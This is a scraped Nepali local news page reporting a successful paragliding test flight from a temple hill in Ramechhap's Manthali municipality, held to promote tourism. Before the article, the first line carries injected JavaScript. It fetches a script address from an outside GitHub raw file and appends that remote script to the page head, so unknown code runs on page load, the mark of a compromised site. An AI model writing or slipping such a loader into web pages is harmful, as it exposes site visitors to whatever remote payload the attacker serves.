;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापको पुरानागाउँमा प्याराग्यालाईडिङ परिक्षण उडान सफल (फोटोफिचर) – जुनेली न्युज
सोमवार, बैशाख २, २०८२
  • होमपेज
  • रामेछापको पुरानागाउँमा प्याराग्यालाईडिङ परिक्षण उडान सफल (फोटोफिचर)
रामेछाप बिशेष

रामेछापको पुरानागाउँमा प्याराग्यालाईडिङ परिक्षण उडान सफल (फोटोफिचर)

मंसिर ११,

रामेछाप । रामेछापको मन्थली नगरपालिका वडा नं -९ पुरानागाउँमा प्याराग्यालाईडिङ परिक्षण उडान सफल भएको छ ।

बिहिबार आन्तरिक तथा बाह्य पर्यटन प्रबर्द्धन गर्नकै लागि परिक्षण उडान गरिएकोमा उडान सफल भएको वडा अध्यक्ष भरत पुलामीले जानकारी दिए । एतिहासिक तथा धार्मिक स्थल स्थानपती महादेव मन्दिर डाँडाबाट परिक्षण उडान गरिएको थियो । बिहिबार हरिबोधनी एकादशी तथा तुलसी विवहाको शुभअवसर पारी नगकै नमुनाको रुपमा वडाले परिक्षण उडान गरेको हो ।

फोटो र भिडियो हेर्नुहोस्

भिडियो लिकं यहाँ ।

फेसबुक प्रतिक्रियाहरु